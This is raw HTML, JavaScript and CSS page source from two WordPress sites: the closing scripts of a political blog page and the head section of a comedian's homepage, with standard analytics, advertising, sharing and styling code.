{"widths":[370,700,1000,1200,1400,2000],"is_logged_in":"","lang":"en","ajaxurl":"https:\/\/slowfacts.wordpress.com\/wp-admin\/admin-ajax.php","nonce":"20067da137","display_exif":"1","display_geo":"1","single_image_gallery":"1","single_image_gallery_media_file":"","background_color":"black","comment":"Comment","post_comment":"Post Comment","write_comment":"Write a Comment...","loading_comments":"Loading Comments...","download_original":"View full size <span class=\"photo-size\">{0}<span class=\"photo-size-times\">\u00d7<\/span>{1}<\/span>","no_comment_text":"Please be sure to submit some text with your comment.","no_comment_email":"Please provide an email address to comment.","no_comment_author":"Please provide your name to comment.","comment_post_error":"Sorry, but there was an error posting your comment. Please try again later.","comment_approved":"Your comment was approved.","comment_unapproved":"Your comment is in moderation.","camera":"Camera","aperture":"Aperture","shutter_speed":"Shutter Speed","focal_length":"Focal Length","copyright":"Copyright","comment_registration":"0","require_name_email":"1","login_url":"https:\/\/slowfacts.wordpress.com\/wp-login.php?redirect_to=https%3A%2F%2Fslowfacts.wordpress.com%2F2019%2F05%2F13%2Fgun-control-failed-again-in-denver-mass-murderers-dont-obey-the-law%2F","blog_id":"23064700","meta_data":["camera","aperture","shutter_speed","focal_length","copyright"],"local_comments_commenting_as":"<fieldset><label for=\"email\">Email (Required)<\/label> <input type=\"text\" name=\"email\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-email-field\" \/><\/fieldset><fieldset><label for=\"author\">Name (Required)<\/label> <input type=\"text\" name=\"author\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-author-field\" \/><\/fieldset><fieldset><label for=\"url\">Website<\/label> <input type=\"text\" name=\"url\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-url-field\" \/><\/fieldset>","reblog":"Reblog","reblogged":"Reblogged","reblog_add_thoughts":"Add your thoughts here... (optional)","reblogging":"Reblogging...","post_reblog":"Post Reblog","stats_query_args":"blog=23064700&v=wpcom&tz=-5&user_id=0&subd=slowfacts","is_public":"1","reblog_enabled":""}; /* ]]> */ </script> <script type='text/javascript' src='https://s2.wp.com/_static/??-eJyVkcFuAyEMRH+o1E3VqLlU/RYCTmIWDMVmt/37slJ2VeWA1NswnnkyAEsxLrMiKwQBjzM5LN/PQZ7gzyg1U2K7EgtEmlDgq2HDm2UfsQ7CxBdi0p9dDLIL+SuqALY+zROhiXYBxVSiVXzwBxzrE7E52wrJimLtyuQZayXfKbv3T4JW6yYZlZxS5rW0q0Ha2ZqbYISAWjrZbMbWIXaxrQv3X5Hlks8BnT4CN9rcr5bBiqzvF+7nUlHWhT/Tx+F4fH87nE4vr+EXWOK64w=='></script> <script type='text/javascript' src='https://platform.twitter.com/widgets.js?ver=20111117'></script> <script type='text/javascript' src='https://s0.wp.com/_static/??-eJyVy0sOQEAMANALqcZnluIsmGbSUTUZRdyerZVYvsXDM8G0qpEaLjsk2QPrhnayGWUYZZjmkbOHxIRKB2VSzxrKuBX456bvx0IewiBC+XrrWf3SVc61deOquo03DQdDyw=='></script> <script type='text/javascript'> <!--//--><![CDATA[//><!-- PDRTJS_settings_4489229_post_15514={"id":4489229,"unique_id":"wp-post-15514","title":"Guns%20Ownership%20is%20a%20Dangerous%20Virtue..%20and%20we%20need%20to%20defend%26nbsp%3Bit","permalink":"https:\/\/slowfacts.wordpress.com\/2019\/05\/14\/guns-ownership-is-a-dangerous-virtue-and-we-need-to-defend-it\/","item_id":"_post_15514"}; if ( typeof PDRTJS_RATING !== 'undefined' ){if ( typeof PDRTJS_4489229_post_15514 == 'undefined' ){PDRTJS_4489229_post_15514 = new PDRTJS_RATING( PDRTJS_settings_4489229_post_15514 );}}PDRTJS_settings_4489229_post_15498={"id":4489229,"unique_id":"wp-post-15498","title":"Gun%20Control%20Failed%20Again%20in%20Denver-%20mass%20murderers%20don%26%238217%3Bt%20obey%20the%26nbsp%3Blaw","permalink":"https:\/\/slowfacts.wordpress.com\/2019\/05\/13\/gun-control-failed-again-in-denver-mass-murderers-dont-obey-the-law\/","item_id":"_post_15498"}; if ( typeof PDRTJS_RATING !== 'undefined' ){if ( typeof PDRTJS_4489229_post_15498 == 'undefined' ){PDRTJS_4489229_post_15498 = new PDRTJS_RATING( PDRTJS_settings_4489229_post_15498 );}}PDRTJS_settings_4489229_post_15486={"id":4489229,"unique_id":"wp-post-15486","title":"How%20to%20Skew%20the%20Debate%20and%20Get%20More%20Kids%26nbsp%3BKilled","permalink":"https:\/\/slowfacts.wordpress.com\/2019\/05\/10\/how-to-skew-the-debate-and-get-more-kids-killed\/","item_id":"_post_15486"}; if ( typeof PDRTJS_RATING !== 'undefined' ){if ( typeof PDRTJS_4489229_post_15486 == 'undefined' ){PDRTJS_4489229_post_15486 = new PDRTJS_RATING( PDRTJS_settings_4489229_post_15486 );}}PDRTJS_settings_4489229_post_15482={"id":4489229,"unique_id":"wp-post-15482","title":"School%20Shootings-%20Plastic%20Signs%20and%20Synthetic%26nbsp%3BEmotions","permalink":"https:\/\/slowfacts.wordpress.com\/2019\/05\/08\/school-shootings-plastic-signs-and-synthetic-emotions\/","item_id":"_post_15482"}; if ( typeof PDRTJS_RATING !== 'undefined' ){if ( typeof PDRTJS_4489229_post_15482 == 'undefined' ){PDRTJS_4489229_post_15482 = new PDRTJS_RATING( PDRTJS_settings_4489229_post_15482 );}}PDRTJS_settings_4489229_post_15472={"id":4489229,"unique_id":"wp-post-15472","title":"Political%20Lies%20and%20the%20Aging%26nbsp%3BRevolution","permalink":"https:\/\/slowfacts.wordpress.com\/2019\/05\/08\/political-lies-and-the-aging-revolution\/","item_id":"_post_15472"}; if ( typeof PDRTJS_RATING !== 'undefined' ){if ( typeof PDRTJS_4489229_post_15472 == 'undefined' ){PDRTJS_4489229_post_15472 = new PDRTJS_RATING( PDRTJS_settings_4489229_post_15472 );}}PDRTJS_settings_4489229_post_15463={"id":4489229,"unique_id":"wp-post-15463","title":"The%20Truth%20of%20Socialism%20on%20the%20Little%26nbsp%3BScreen","permalink":"https:\/\/slowfacts.wordpress.com\/2019\/05\/01\/the-truth-of-socialism-on-the-little-screen\/","item_id":"_post_15463"}; if ( typeof PDRTJS_RATING !== 'undefined' ){if ( typeof PDRTJS_4489229_post_15463 == 'undefined' ){PDRTJS_4489229_post_15463 = new PDRTJS_RATING( PDRTJS_settings_4489229_post_15463 );}}PDRTJS_settings_4489229_post_15461={"id":4489229,"unique_id":"wp-post-15461","title":"No%20Lawyers%20%26%238211%3B%20Only%20Guns%20and%20Money%3A%20SCOTUS%20To%20New%20York%20City%20%26%238211%3B%20Motion%26nbsp%3BDenied","permalink":"https:\/\/slowfacts.wordpress.com\/2019\/04\/30\/no-lawyers-only-guns-and-money-scotus-to-new-york-city-motion-denied\/","item_id":"_post_15461"}; if ( typeof PDRTJS_RATING !== 'undefined' ){if ( typeof PDRTJS_4489229_post_15461 == 'undefined' ){PDRTJS_4489229_post_15461 = new PDRTJS_RATING( PDRTJS_settings_4489229_post_15461 );}} //--><!]]> </script> <script type='text/javascript' src='https://polldaddy.com/js/rating/rating.js?ver=wpcom'></script> <script type='text/javascript'> /* <![CDATA[ */ var sharing_js_options = {"lang":"en","counts":"1","is_stats_active":"1"}; /* ]]> */ </script> <script type='text/javascript' src='https://s1.wp.com/wp-content/mu-plugins/post-flair/sharing/sharing.js?m=1554999852h'></script> <script type='text/javascript'> var windowOpen; jQuery( document.body ).on( 'click', 'a.share-facebook', function() { // If there's another sharing window open, close it. if ( 'undefined' !== typeof windowOpen ) { windowOpen.close(); } windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomfacebook', 'menubar=1,resizable=1,width=600,height=400' ); return false; }); </script> <script type="text/javascript"> // <![CDATA[ (function() { try{ if ( window.external &&'msIsSiteMode' in window.external) { if (window.external.msIsSiteMode()) { var jl = document.createElement('script'); jl.type='text/javascript'; jl.async=true; jl.src='/wp-content/plugins/ie-sitemode/custom-jumplist.php'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(jl, s); } } }catch(e){} })(); // ]]> </script><script type="text/javascript"> jQuery.extend( infiniteScroll.settings.scripts, ["jquery-core","jquery-migrate","jquery","postmessage","mobile-useragent-info","jquery_inview","jetpack_resize","spin","jquery.spin","grofiles-cards","wpgroho","jquery.autoresize","highlander-comments","devicepx","jetpack_likes_queuehandler","the-neverending-homepage","eu-cookie-law-script","wpcom-masterbar-js","wpcom-masterbar-tracks-js","wpcom-actionbar-bar","jetpack-carousel","swfobject","videopress","twitter-widgets","twitter-widgets-infinity","twitter-widgets-pending","tiled-gallery","crowdsignal-rating","sharing-js"] ); jQuery.extend( infiniteScroll.settings.styles, ["wpcom-smileys","jetpack_likes","the-neverending-homepage","infinity-vigilance","wp-block-library","wpcom-core-compat-playlist-styles","mp6hacks","wpcom-bbpress2-staff-css","vigilance","eu-cookie-law-style","noticons","geo-location-flair","reblogging","a8c-global-print","wpcom-actionbar-bar","sharedaddy","social-logos","h4-global","highlander-comments","highlander-comments-ie7","jetpack-carousel","tiled-gallery"] ); </script> <iframe src='https://widgets.wp.com/likes/master.html?ver=20190321#ver=20190321' scrolling='no' id='likes-master' name='likes-master' style='display:none;'></iframe> <div id='likes-other-gravatars'><div class="likes-text"><span>%d</span> bloggers like this:</div><ul class="wpl-avatars sd-like-gravatars"></ul></div> <script src="//stats.wp.com/w.js?60" type="text/javascript" async defer></script> <script type="text/javascript"> _tkq = window._tkq || []; _stq = window._stq || []; _tkq.push(['storeContext', {'blog_id':'23064700','blog_tz':'-5','user_lang':'en','blog_lang':'en','user_id':'0'}]); _stq.push(['view', {'blog':'23064700','v':'wpcom','tz':'-5','user_id':'0','subd':'slowfacts'}]); _stq.push(['extra', {'crypt':'UE40eW5QN0p8M2Y/RE0/bU8yQkx3RTR3RmZTSndoTltKYUtEYz9mTHN3MlJ2cWh3ZmwzZGYubUxraS83bFJ8by9SUXlTXWIrWEkxPVlOTmQsN0NhOVRndVFkNkxGP0RsdXZLYjB4aExtdHplfldrRndCTEcwN00lU3wmRHlyUk1yaXpWbS8vM1I/P0dJWFM3dzNHNmpXejY9a1JGWTlUWkhFVmJvLmlQPXEtSTEzSU5BM0MyZDNLfjlTciU3eFRsSlNVfnxrTi9VMVBnOXNuZVtFLDRxUkMuT2N4Jj9ua0hIdHVVL0l8d35QUlV3MXZGTiV2VmdKeUxlUSVLTW1uSUE1YktRNXB4TDg3cUpbRDgtTko0VC1DL3BSJX4rdDArdUY5Z0JzW0E2eHc='}]); _stq.push([ 'clickTrackerInit', '23064700', '0' ]); </script> <noscript><img src="https://pixel.wp.com/b.gif?v=noscript" style="height:0px;width:0px;overflow:hidden" alt="" /></noscript> <script> if ( 'object' === typeof wpcom_mobile_user_agent_info ) { wpcom_mobile_user_agent_info.init(); var mobileStatsQueryString = ""; if( false !== wpcom_mobile_user_agent_info.matchedPlatformName ) mobileStatsQueryString += "&x_" + 'mobile_platforms' + '=' + wpcom_mobile_user_agent_info.matchedPlatformName; if( false !== wpcom_mobile_user_agent_info.matchedUserAgentName ) mobileStatsQueryString += "&x_" + 'mobile_devices' + '=' + wpcom_mobile_user_agent_info.matchedUserAgentName; if( wpcom_mobile_user_agent_info.isIPad() ) mobileStatsQueryString += "&x_" + 'ipad_views' + '=' + 'views'; if( "" != mobileStatsQueryString ) { new Image().src = document.location.protocol + '//pixel.wp.com/g.gif?v=wpcom-no-pv' + mobileStatsQueryString + '&baba=' + Math.random(); } } </script></body> </html>
0
<!DOCTYPE html> <html lang="en-US"> <head> <!-- Global site tag (gtag.js) - Google Analytics --> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-134568775-1"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-134568775-1'); </script> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="http://gmpg.org/xfn/11" /> <link rel="pingback" href="https://jimmydorecomedy.com/xmlrpc.php" /> <title>Jimmy Dore Comedy &#8211; The antidote to the mainstream noise makers, Jimmy Dore’s take-no-prisoners approach fearlessly skewers both political parties and all sides of corporate media.</title> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Jimmy Dore Comedy &raquo; Feed" href="https://jimmydorecomedy.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Jimmy Dore Comedy &raquo; Comments Feed" href="https://jimmydorecomedy.com/comments/feed/" /> <link rel="alternate" type="text/calendar" title="Jimmy Dore Comedy &raquo; iCal Feed" href="https://jimmydorecomedy.com/events/?ical=1" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/jimmydorecomedy.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.1.1"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='pmpro_frontend-css' href='https://upisnvej69-flywheel.netdna-ssl.com/wp-content/plugins/paid-memberships-pro/css/frontend.css?ver=2.0.4' type='text/css' media='screen' /> <link rel='stylesheet' id='pmpro_print-css' href='https://upisnvej69-flywheel.netdna-ssl.com/wp-content/plugins/paid-memberships-pro/css/print.css?ver=2.0.4' type='text/css' media='print' /> <link rel='stylesheet' id='wp-block-library-css' href='https://upisnvej69-flywheel.netdna-ssl.com/wp-includes/css/dist/block-library/style.min.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='pmpro-add-paypal-express-styles-css' href='https://upisnvej69-flywheel.netdna-ssl.com/wp-content/plugins/pmpro-add-paypal-express/css/pmpro-add-paypal-express.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='social-widget-css' href='https://upisnvej69-flywheel.netdna-ssl.com/wp-content/plugins/social-media-widget/social_widget.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='accelerate_style-css' href='https://upisnvej69-flywheel.netdna-ssl.com/wp-content/themes/accelerate/style.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='accelerate_googlefonts-css' href='//fonts.googleapis.com/css?family=Roboto%3A400%2C300%2C100%7CRoboto+Slab%3A700%2C400&#038;ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='accelerate-fontawesome-css' href='https://upisnvej69-flywheel.netdna-ssl.com/wp-content/themes/accelerate/fontawesome/css/font-awesome.css?ver=4.7.0' type='text/css' media='all' /> <link rel='stylesheet' id='jquery-lazyloadxt-spinner-css-css' href='//jimmydorecomedy.com/wp-content/plugins/a3-lazy-load/assets/css/jquery.lazyloadxt.spinner.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='a3a3_lazy_load-css' href='//jimmydorecomedy.com/wp-content/uploads/sass/a3_lazy_load.min.css?ver=1499656860' type='text/css' media='all' /> <link rel='stylesheet' id='__EPYT__style-css' href='https://upisnvej69-flywheel.netdna-ssl.com/wp-content/plugins/youtube-embed-plus-pro/styles/ytprefs.min.css?ver=13.1' type='text/css' media='all' /> <style id='__EPYT__style-inline-css' type='text/css'> .epyt-gallery-thumb { width: 33.333%; } </style> <link rel='stylesheet' id='__disptype__-css' href='https://upisnvej69-flywheel.netdna-ssl.com/wp-content/plugins/youtube-embed-plus-pro/scripts/lity.min.css?ver=13.1' type='text/css' media='all' /> <script type='text/javascript' src='https://upisnvej69-flywheel.netdna-ssl.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://upisnvej69-flywheel.netdna-ssl.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='https://upisnvej69-flywheel.netdna-ssl.com/wp-content/themes/accelerate/js/accelerate-custom.js?ver=5.1.1'></script> <!--[if lte IE 8]> <script type='text/javascript' src='https://upisnvej69-flywheel.netdna-ssl.com/wp-content/themes/accelerate/js/html5shiv.js?ver=3.7.3'></script> <![endif]--> <script type='text/javascript' src='https://upisnvej69-flywheel.netdna-ssl.com/wp-content/plugins/youtube-embed-plus-pro/scripts/lity.min.js?ver=13.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var _EPYT_ = {"ajaxurl":"https:\/\/jimmydorecomedy.com\/wp-admin\/admin-ajax.php","security":"3e75a8de6b","gallery_scrolloffset":"50","eppathtoscripts":"https:\/\/jimmydorecomedy.com\/wp-content\/plugins\/youtube-embed-plus-pro\/scripts\/","eppath":"https:\/\/jimmydorecomedy.com\/wp-content\/plugins\/youtube-embed-plus-pro\/","epresponsiveselector":"[\"iframe.__youtube_prefs_widget__\"]","epdovol":"1","version":"13.1","evselector":"iframe.__youtube_prefs__[src], iframe[src*=\"youtube.com\/embed\/\"], iframe[src*=\"youtube-nocookie.com\/embed\/\"]","ajax_compat":"","ytapi_load":"light","stopMobileBuffer":"1","vi_active":"","vi_js_posttypes":[],"dshpre":"1"}; /* ]]> */ </script> <script type='text/javascript' src='https://upisnvej69-flywheel.netdna-ssl.com/wp-content/plugins/youtube-embed-plus-pro/scripts/ytprefs.min.js?ver=13.1'></script> <link rel='https://api.w.org/' href='https://jimmydorecomedy.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://jimmydorecomedy.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://jimmydorecomedy.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.1.1" /> <link rel="canonical" href="https://jimmydorecomedy.com/" /> <link rel='shortlink' href='https://jimmydorecomedy.com/' /> <link rel="alternate" type="application/json+oembed" href="https://jimmydorecomedy.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fjimmydorecomedy.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://jimmydorecomedy.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fjimmydorecomedy.com%2F&#038;format=xml" /> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <script> (adsbygoogle = window.adsbygoogle || []).push({ google_ad_client: "ca-pub-2508794871496533", enable_page_level_ads: true }); </script><meta name="tec-api-version" content="v1"><meta name="tec-api-origin" content="https://jimmydorecomedy.com"><link rel="https://theeventscalendar.com/" href="https://jimmydorecomedy.com/wp-json/tribe/events/v1/" /> <style type="text/css"> .accelerate-button,blockquote,button,input[type=button],input[type=reset],input[type=submit]{background-color:#1e73be}a{color:#1e73be}#page{border-top:3px solid #1e73be}#site-title a:hover{color:#1e73be}#search-form span,.main-navigation a:hover,.main-navigation ul li ul li a:hover,.main-navigation ul li ul li:hover>a,.main-navigation ul li.current-menu-ancestor a,.main-navigation ul li.current-menu-item a,.main-navigation ul li.current-menu-item ul li a:hover,.main-navigation ul li.current_page_ancestor a,.main-navigation ul li.current_page_item a,.main-navigation ul li:hover>a,.main-small-navigation li:hover > a{background-color:#1e73be}.site-header .menu-toggle:before{color:#1e73be}.main-small-navigation li:hover{background-color:#1e73be}.main-small-navigation ul>.current-menu-item,.main-small-navigation ul>.current_page_item{background:#1e73be}.footer-menu a:hover,.footer-menu ul li.current-menu-ancestor a,.footer-menu ul li.current-menu-item a,.footer-menu ul li.current_page_ancestor a,.footer-menu ul li.current_page_item a,.footer-menu ul li:hover>a{color:#1e73be}#featured-slider .slider-read-more-button,.slider-title-head .entry-title a{background-color:#1e73be}a.slide-prev,a.slide-next,.slider-title-head .entry-title a{background-color:#1e73be}#controllers a.active,#controllers a:hover{background-color:#1e73be;color:#1e73be}.format-link .entry-content a{background-color:#1e73be}#secondary .widget_featured_single_post h3.widget-title a:hover,.widget_image_service_block .entry-title a:hover{color:#1e73be}.pagination span{background-color:#1e73be}.pagination a span:hover{color:#1e73be;border-color:#1e73be}#content .comments-area a.comment-edit-link:hover,#content .comments-area a.comment-permalink:hover,#content .comments-area article header cite a:hover,.comments-area .comment-author-link a:hover{color:#1e73be}.comments-area .comment-author-link span{background-color:#1e73be}#wp-calendar #today,.comment .comment-reply-link:hover,.nav-next a,.nav-previous a{color:#1e73be}.widget-title span{border-bottom:2px solid #1e73be}#secondary h3 span:before,.footer-widgets-area h3 span:before{color:#1e73be}#secondary .accelerate_tagcloud_widget a:hover,.footer-widgets-area .accelerate_tagcloud_widget a:hover{background-color:#1e73be}.footer-widgets-area a:hover{color:#1e73be}.footer-socket-wrapper{border-top:3px solid #1e73be}.footer-socket-wrapper .copyright a:hover{color:#1e73be}a#scroll-up{background-color:#1e73be}.entry-meta .byline i,.entry-meta .cat-links i,.entry-meta a,.post .entry-title a:hover{color:#1e73be}.entry-meta .post-format i{background-color:#1e73be}.entry-meta .comments-link a:hover,.entry-meta .edit-link a:hover,.entry-meta .posted-on a:hover,.main-navigation li.menu-item-has-children:hover,.entry-meta .tag-links a:hover{color:#1e73be}.more-link span,.read-more{background-color:#1e73be}@media (max-width: 768px){.better-responsive-menu .sub-toggle{background:#00418c}}.woocommerce #respond input#submit, .woocommerce a.button, .woocommerce button.button, .woocommerce input.button, .woocommerce #respond input#submit.alt, .woocommerce a.button.alt, .woocommerce button.button.alt, .woocommerce input.button.alt,.woocommerce span.onsale {background-color: #1e73be;}.woocommerce ul.products li.product .price .amount,.entry-summary .price .amount,.woocommerce .woocommerce-message::before{color: #1e73be;},.woocommerce .woocommerce-message { border-top-color: #1e73be;}</style> <style type="text/css"> #page { position: relative !important; } @media (max-width: 991px) { #tribe-events-list-widget-3 { display: none !important; } } @media (min-width: 992px) and (max-width: 1199px) { .header-image { width: 85% !important; position: relative !important; left: -5% !important; margin-bottom: 50px !important; top: 20px !important; } #tribe-events-list-widget-3 { position: absolute !important; top: 50px !important; width: 240px !important; right: 4% !important; height: 160px !important; overflow: hidden !important; } #tribe-events-list-widget-3 .widget-title { font-size: 18px !important; margin-bottom: 5px !important; padding-bottom: 0 !important; } #tribe-events-list-widget-3 .tribe-event-duration { display: none !important; } #tribe-events-list-widget-3 .tribe-events-widget-link { display: none !important; } #tribe-events-list-widget-3 ol li { margin-bottom: 10px !important; padding-bottom: 0 !important; border-bottom: 0 !important; } #tribe-events-list-widget-3 .tribe-event-title { font-size: 14px !important; line-height: 16px !important; margin-bottom: 0 !important; padding-bottom: 0 !important; } } @media (min-width: 1200px) { .header-image { width: 90% !important; position: relative !important; left: -60px !important; margin-bottom: 25px !important; top: 10px !important; } #tribe-events-list-widget-3 { position: absolute !important; top: 50px !important; width: 240px !important; margin-left: 100px !important; height: 160px !important; overflow: hidden !important; } #tribe-events-list-widget-3 .widget-title { font-size: 18px !important; margin-bottom: 5px !important; padding-bottom: 0 !important; } #tribe-events-list-widget-3 .tribe-event-duration { display: none !important; } #tribe-events-list-widget-3 .tribe-events-widget-link { display: none !important; } #tribe-events-list-widget-3 ol li { margin-bottom: 10px !important; padding-bottom: 0 !important; border-bottom: 0 !important; } #tribe-events-list-widget-3 .tribe-event-title { font-size: 14px !important; line-height: 16px !important; margin-bottom: 0 !important; padding-bottom: 0 !important; } } /* @media (min-width: 768px) and (max-width: 991px) { .header-image { width: 90% !important; position: relative !important; left: -5% !important; margin-bottom: 25px !important; } #tribe-events-list-widget-3 { position: absolute !important; top: 50px !important; width: 165px !important; margin-left: 8% !important; height: 115px !important; overflow: hidden !important; } #tribe-events-list-widget-3 .widget-title { font-size: 14px !important; line-height: 18px !important; margin-bottom: 0 !important; padding-bottom: 0 !important; } #tribe-events-list-widget-3 .tribe-event-duration { display: none !important; } #tribe-events-list-widget-3 .tribe-events-widget-link { display: none !important; } #tribe-events-list-widget-3 ol li { margin-bottom: 4px !important; padding-bottom: 0 !important; border-bottom: 0 !important; } #tribe-events-list-widget-3 .tribe-event-title { font-size: 12px !important; line-height: 14px !important; margin-bottom: 0 !important; padding-bottom: 0 !important; } } */ @media (max-width: 768px) { .better-responsive-menu .sub-toggle { width: 100%; height: 40px; position: absolute; right: 0; top: 0; margin: 0; padding: 0; background: none; } #vimeography-gallery-2.vimeography-bugsauce .vimeography-bugsauce-direction-nav a.vimeography-bugsauce-next span, #vimeography-gallery-2.vimeography-bugsauce .vimeography-bugsauce-direction-nav a.vimeography-bugsauce-prev span { border-width: 12px !important; } } #text-2 img { width: 320px; height: 180px; } @media (max-width: 1024px) and (min-width: 768px) { .sub-toggle { width: 100%; height: 100%; position: absolute; bottom: 0; left: 0; cursor: default; } } #text-2 { display: none; } .post-type-archive-tribe_events #text-2 { display: block; } .live-clip-title { padding-bottom: 5px; } #content article .posted-on, #content article .edit-link { display: none; } #content .previous, #content .next { display: none; } #text-2 span:before { display: none; } #text-3 span:before { display: none; } #text-4 span:before { display: none; } .paypal-donate:hover { opacity: .8; } .tribe-events-abbr { text-decoration: none; } #media_image-5 { overflow: hidden; } .wp-image-2868 { width: 200px; } #media_image-6 img, #media_image-7 img, #media_image-2 img, #media_image-3 img, #media_image-4 img { width: 340px; } #ysg_widget-2 { display: none; } .post-type-archive-tribe_events #ysg_widget-2 { display: block; } .post-type-archive-tribe_events #text-3, .post-type-archive-tribe_events #nav_menu-2, .post-type-archive-tribe_events #social-widget-2, .post-type-archive-tribe_events #image-5, .post-type-archive-tribe_events #image-6, .post-type-archive-tribe_events #tribe-events-list-widget-2 { display: none; } .tribe-events-calendar th { border: 0 !important; } .tribe-events-month #tribe-events-footer { position: absolute; width: 100%; top: 50px; } .tribe-events-month #tribe-events-footer .tribe-events-nav-previous { position: absolute; left: 0; } .tribe-events-month #tribe-events-footer .tribe-events-nav-next { position: absolute; right: 0; } @media (max-width: 768px) { .tribe-events-month #tribe-events-footer { background: white !important; } .tribe-events-month #tribe-events-footer .tribe-events-nav-previous a, .tribe-events-month #tribe-events-footer .tribe-events-nav-next a { background: white !important; color: #1e73be !important; } } .type-tribe_events { padding-top: 0 !important; margin-top: 0 !important; padding-bottom: 5px !important; margin-bottom: 20px !important; } .tribe-events-list .type-tribe_events h2 { font-size: 1.3em !important; padding-bottom: 0 !important; } .pmpro_checkout tr.active td { background: #1e73be; color: white; } .tribe-events-list-event-description br, .tribe-events-single-event-description br { display: none; } #nav_menu-2 span:before { display: none; } #post-2838 .epyt-pagination:nth-child(1) { display: none; } #post-2838 .epyt-gallery-allthumbs { margin-top: 20px; } #post-2838 .epyt-pagination { padding: 0px 8px 0px 8px; } #post-2838 .entry-content p { display: none; } .no-decoration { text-decoration: none; } .std-blue-btn { margin-bottom: 0; } .slide-next, .slide-prev, #scroll-up, i.fa { display: none !important; } #image-5 { margin-bottom: 15px !important; } .category-premium-videos p { position: relative; width: 100%; padding-bottom: 57%; height: 0; } .category-premium-videos p iframe { width: 100%; height: 100%; position: absolute; top: 0; left: 0; } .header-image { margin-bottom: 10px; } .cvm_single_video_player { margin: 0 auto; } .podcast-audio { width: 100%; } .page .entry-header { display: none; } #TB_window { width: 670px !important; height: 453px !important; } #TB_ajaxContent { padding-top: 15px !important; } .img-YoutubeGallery.chr-size-s-thumb { width: 100% !important; height: 100% !important; } .tribe-event-title { font-size: 20px; line-height: 24px; padding-bottom: 10px; } .tribe-events-list-widget-events { border-bottom: 1px solid #F8F8F8; padding-bottom: 10px; margin-bottom: 10px !important; } .tribe-events-single-section-title { padding-bottom: 0; } .tribe-events-ical { display: none !important; } .tribe-events-meta-group { width: 50% !important; } .tribe-events-cal-links { display: none !important; } .entry-meta .byline, .entry-meta .cat-links { display: none; } .post .entry-title { padding-bottom: 0; text-transform: capitalize; } .entry-content .post { padding-bottom: 0 !important; } h3.title-Widget-YoutubeGallery { font-size: 20px; padding-bottom: 0; padding-top: 0; } .btn-YSG-Widget { display: none; } 